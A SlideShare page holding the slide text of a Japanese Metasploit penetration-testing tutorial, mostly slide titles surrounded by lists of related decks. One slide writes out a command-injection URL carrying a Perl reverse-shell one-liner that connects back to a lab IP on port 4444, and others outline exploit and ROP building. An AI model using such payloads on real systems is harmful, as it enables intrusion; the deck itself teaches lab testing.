Enviar pesquisa
Carregar
Metasploitでペネトレーションテスト
•
Transferir como PPTX, PDF
•
39 gostaram
•
23,658 visualizações
S
super_a1ice
Seguir
Internet
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 49
Baixar agora
Recomendados
Rootlessコンテナ
Rootlessコンテナ
Akihiro Suda
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
オープンソースライセンスの基礎と実務
オープンソースライセンスの基礎と実務
Yutaka Kachi
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
Scapyで作る・解析するパケット
Scapyで作る・解析するパケット
Takaaki Hoyo
本当は恐ろしい分散システムの話
本当は恐ろしい分散システムの話
Kumazaki Hiroki
DockerとPodmanの比較
DockerとPodmanの比較
Akihiro Suda
初心者向けMongoDBのキホン!
初心者向けMongoDBのキホン!
Tetsutaro Watanabe
Recomendados
Rootlessコンテナ
Rootlessコンテナ
Akihiro Suda
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
オープンソースライセンスの基礎と実務
オープンソースライセンスの基礎と実務
Yutaka Kachi
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
Scapyで作る・解析するパケット
Scapyで作る・解析するパケット
Takaaki Hoyo
本当は恐ろしい分散システムの話
本当は恐ろしい分散システムの話
Kumazaki Hiroki
DockerとPodmanの比較
DockerとPodmanの比較
Akihiro Suda
初心者向けMongoDBのキホン!
初心者向けMongoDBのキホン!
Tetsutaro Watanabe
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Masahito Zembutsu
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
Yoshio Hanawa
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
NTT DATA Technology & Innovation
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
DockerコンテナでGitを使う
DockerコンテナでGitを使う
Kazuhiro Suga
脆弱性スキャナVuls(応用編)
脆弱性スキャナVuls(応用編)
Takayuki Ushida
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Masahito Zembutsu
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
Keisuke Takahashi
フリーでできるセキュリティチェック OpenVAS CLI編
フリーでできるセキュリティチェック OpenVAS CLI編
abend_cve_9999_0001
perfを使ったPostgreSQLの解析(前編)
perfを使ったPostgreSQLの解析(前編)
NTT DATA OSS Professional Services
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
mosa siru
Windowsコンテナ入門
Windowsコンテナ入門
Kyohei Mizumoto
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Takaya Saeki
Spring Cloud Data Flow の紹介 #streamctjp
Spring Cloud Data Flow の紹介 #streamctjp
Yahoo!デベロッパーネットワーク
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
みんなのPython勉強会#77 パッケージングしよう
みんなのPython勉強会#77 パッケージングしよう
Atsushi Odagiri
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
今話題のいろいろなコンテナランタイムを比較してみた
今話題のいろいろなコンテナランタイムを比較してみた
Kohei Tokunaga
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
Mais conteúdo relacionado
Mais procurados
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
ken_kitahara
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Masahito Zembutsu
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
Yoshio Hanawa
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
NTT DATA Technology & Innovation
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
DockerコンテナでGitを使う
DockerコンテナでGitを使う
Kazuhiro Suga
脆弱性スキャナVuls(応用編)
脆弱性スキャナVuls(応用編)
Takayuki Ushida
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Masahito Zembutsu
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
Keisuke Takahashi
フリーでできるセキュリティチェック OpenVAS CLI編
フリーでできるセキュリティチェック OpenVAS CLI編
abend_cve_9999_0001
perfを使ったPostgreSQLの解析(前編)
perfを使ったPostgreSQLの解析(前編)
NTT DATA OSS Professional Services
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
mosa siru
Windowsコンテナ入門
Windowsコンテナ入門
Kyohei Mizumoto
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Takaya Saeki
Spring Cloud Data Flow の紹介 #streamctjp
Spring Cloud Data Flow の紹介 #streamctjp
Yahoo!デベロッパーネットワーク
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
みんなのPython勉強会#77 パッケージングしよう
みんなのPython勉強会#77 パッケージングしよう
Atsushi Odagiri
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
今話題のいろいろなコンテナランタイムを比較してみた
今話題のいろいろなコンテナランタイムを比較してみた
Kohei Tokunaga
Mais procurados
(20)
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker Compose 徹底解説
Docker Compose 徹底解説
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
iOS/macOSとAndroid/Linuxのサンドボックス機構について調べた
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
実践!OpenTelemetry と OSS を使った Observability 基盤の構築(CloudNative Days Tokyo 2022 発...
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
DockerコンテナでGitを使う
DockerコンテナでGitを使う
脆弱性スキャナVuls(応用編)
脆弱性スキャナVuls(応用編)
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Docker Compose入門~今日から始めるComposeの初歩からswarm mode対応まで
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
Azure Database for PostgreSQL 入門 (PostgreSQL Conference Japan 2021)
フリーでできるセキュリティチェック OpenVAS CLI編
フリーでできるセキュリティチェック OpenVAS CLI編
perfを使ったPostgreSQLの解析(前編)
perfを使ったPostgreSQLの解析(前編)
マイクロにしすぎた結果がこれだよ!
マイクロにしすぎた結果がこれだよ!
Windowsコンテナ入門
Windowsコンテナ入門
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Spring Cloud Data Flow の紹介 #streamctjp
Spring Cloud Data Flow の紹介 #streamctjp
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
みんなのPython勉強会#77 パッケージングしよう
みんなのPython勉強会#77 パッケージングしよう
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
今話題のいろいろなコンテナランタイムを比較してみた
今話題のいろいろなコンテナランタイムを比較してみた
Destaque
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
UEHARA, Tetsutaro
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
Hiroshi Tokumaru
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
Sen Ueno
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
sonickun
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
sonickun
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
monochrojazz
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
Burp Suite Japan User Group
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
Ken SASAKI
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
Ierae Security
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
LINE Corporation
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
sonickun
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
zaki4649
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
Takaaki Hoyo
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
shigeki_ohtsu
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Takeshi HASEGAWA
Destaque
(20)
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Semelhante a Metasploitでペネトレーションテスト
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Masatoshi Itoh
Spock's world
Spock's world
Takuma Watabiki
BBBBB
BBBBB
arase_utagoe
1MB
1MB
arase_utagoe
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
kinunori
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
urasandesu
vFabricを触ろう
vFabricを触ろう
土岐 孝平
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
hakoika-itwg
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Seiji KOMATSU
Version管理 1
Version管理 1
hakoika-itwg
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
彰 村地
20130329 rtm2
20130329 rtm2
openrtm
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
OSSラボ株式会社
CruiseControl.NET設置
CruiseControl.NET設置
Kuniaki Igarashi
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Masataka MIZUNO
Kobe sec#7 summary
Kobe sec#7 summary
Yukio NAGAO
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JPCERT Coordination Center
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
Etsuji Nakai
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Tetsuya Chiba
Capistranoで自動デプロイ
Capistranoで自動デプロイ
toyoshi
Semelhante a Metasploitでペネトレーションテスト
(20)
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Spock's world
Spock's world
BBBBB
BBBBB
1MB
1MB
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
vFabricを触ろう
vFabricを触ろう
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Version管理 1
Version管理 1
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
20130329 rtm2
20130329 rtm2
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
CruiseControl.NET設置
CruiseControl.NET設置
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Kobe sec#7 summary
Kobe sec#7 summary
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Capistranoで自動デプロイ
Capistranoで自動デプロイ
Metasploitでペネトレーションテスト
1.
Metasploitでペネトレーションテスト @super_a1ice
2.
目次 Metasploit Framework基本 Webアプリケーションの脆弱性を突いてみる Metasploit プラグイン Exploitを作って電卓を起動してみる
3.
Metasploit Frameworkとは? 脆弱性を発見し、それを実証するためのフレームワー ク ペネトレーションテストを効率化するためのツール システムに重大な被害を与える可能性があるため、使 用には注意が必要
4.
Metasploit Framework基本
5.
Msfconsoleコマンド
6.
モジュールの指定
7.
シェルコードを設定
8.
オプションの確認
9.
ファイル名を設定
10.
IPアドレスを設定
11.
ポート番号を設定
12.
Exploitの作成
13.
C&Cサーバの用意
14.
オプションの確認
15.
シェルコードの設定
16.
オプションの確認
17.
IPアドレスを設定
18.
ポート番号を設定
19.
C&Cサーバの作成
20.
Let's exploit !
21.
Readme.txt
22.
攻撃が成功すると
23.
システム情報の取得
24.
lsコマンド
25.
Webアプリケーションの脆弱性を 突いてみる
26.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意
27.
準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意 後ろに任意のコマンドを挿入可能
28.
※実験の際の注意 必ず仮想環境を用いること 閉じたネットワーク内で実行する スナップショットを用いて被害前の状態へ戻せるように する
29.
ペイロードを選択
30.
IPアドレスの設定
31.
バックドアの生成
32.
C&Cサーバの用意
33.
Let's exploit !! http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20- e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI N-%3Efdopen%28$c,r%29;$~- %3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
34.
攻撃が成功すると
35.
Metasploit プラグイン
36.
プラグインを使用して機能を追加する
37.
便利なプラグイン Openvas MetasploitからOpenVASを利用するためのプラグイン Nessus MetasploitからNessusを利用するためのプラグイン Xssf MetasploitでXSSを行うためのプラグイン http://xssf.googlecode.com/svn/trunk auto_exploit データベースに登録された脆弱性に対してexploitする https://github.com/darkoperator/Metasploit-Plugins Postauto 確立しているセッションにコマンドを送信する https://github.com/darkoperator/Metasploit-Plugins
38.
Exploitを作って電卓を 起動してみる
39.
まずはExploitの用意 Exploit-dbから探す http://www.exploit-db.com/ 自作する
40.
今回は自作プログラムを用意
41.
大きなテキストファイルを読み込まると
42.
ROP自動化
43.
シェルコード選択
44.
変数の確認
45.
実行したいコマンドの設定
46.
pythonのコードを生成
47.
シェルコードをコピペしてから Let's exploit !!!
48.
電卓が起動!!
49.
ありがとうございました
Baixar agora